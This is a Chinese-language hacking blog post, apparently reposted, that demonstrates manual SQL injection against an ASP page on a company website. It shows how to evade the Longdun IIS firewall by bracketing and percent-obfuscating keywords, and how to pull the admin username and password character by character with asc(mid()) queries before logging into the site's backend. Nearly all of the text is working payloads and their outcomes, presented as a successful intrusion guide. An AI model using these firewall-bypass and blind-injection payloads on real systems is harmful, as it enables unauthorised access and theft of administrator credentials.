今天的技术主要是结合网上的和自己的想法思路绕过]龙盾IIS防火墙[其他防火墙没试过
好的废话不多说实战开始, 手工注入,工具是不行啦, 第一咱先判断是否有注入点 http://www.2cto.com /newsShow.asp?ArticleID=120 ’ http://www.2cto.com /newsShow.asp?ArticleID=120 and 1=1 http://www.2cto.com /newsShow.asp?ArticleID=120 and 1=2 一直提示 [龙盾IIS防火墙]提示:请不要提交非法信息或恶意访问 我想这个大家应该都不陌生,现在国内用这个的防火墙还挺多的,我看网上资料也比较少呵呵 自己研究了一下 成功突破~
http://www.2cto.com /newsShow.asp?ArticleID=(120)%20and%20(%201=1%20) 返回正常 http://www.2cto.com /newsShow.asp?ArticleID=(120)%20and%20(%201=2%20) 返回错误 呵呵,看来已经成功突破防火墙的限制啦~哈哈~ 继续踩解吧~ http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct * from admin) 呵呵返回成功,存在admin表,应该是个access的~是一个公司网站,估计也是access的呵呵 http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct username from admin) 呵呵返回成功,存在username表 http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct password from admin) 呵呵返回成功,存在password表 继续往下踩解吧~走吧, http://www.2cto.com /newsShow.asp?ArticleID=(120) order by 1 http://www.2cto.com /newsShow.asp?ArticleID=(120) order by 1 order by 1 一直返回错误 看来 order 是用不了了,没办法 只有一个一个的去踩解啦~
先看看管理员用户名有几位吧~ http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct username from admin where len(username)=5) 一切正常呵呵,不错 RP挺好~ http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,1))=120) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,2))=50) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,3))=99) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,4))=51) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(username,5))=109) 账号都出来了, 用计算器转化了下 帐号就是:x2c3m 后面猜解密码~~ http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists(sele%%%ct password from admin where len(password)=8) 密码一共有8位数
http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,1))=98) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,2))=105) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,3))=111) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,4))=115) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,5))=108) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,6))=111) http://www.2cto.com /newsShow.asp?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,7))=97) http://www.2cto.com /newsShow. asp ?ArticleID=(120) and ex%%%ists (sele%%%ct id from admin where asc(mid(password,8))=100) 密码:b***ad 直接去后台登陆,成功搞定
from:小 马'Blog
查看更多关于小方法“绕过龙盾防火墙” - 网站安全 - 自学p的详细内容...